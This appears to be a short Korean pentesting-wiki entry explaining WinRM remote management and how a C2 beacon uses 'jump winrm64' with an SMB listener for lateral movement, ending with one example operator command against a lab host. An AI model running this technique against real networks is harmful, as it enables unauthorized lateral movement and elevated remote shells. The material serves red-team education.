WinRM은 원격에서 데스크탑 관리를 해야하는 직원, 자동화된 원격 서비스 등을 위해 Microsoft에서 제공하는 서비스입니다. 기본적으로 5985/5986(SSL) 포트를 사용한다고 알려져있으며 원격 데스크탑의 로컬 계정 정보를 알고있다면 쉘을 획득하여 원격 명령이 가능합니다.
비콘에서는 jump 명령의 인자로 winrm/winrm64를 사용할 수 있으며 리스너는 SMB와 같이 Windows 환경에서 광범위하게 사용되는 것을 추천합니다. 비콘의 winrm을 이용해 측면 이동을 했을 때 생성된 비콘은 사용자 권한 중 높은 권한(High Integrity)를 갖습니다.
# winrm64를 통해 원격에서 smb 리스너로 연결 수립 명령
beacon> jump winrm64 web.dev.pentesting.wiki smb
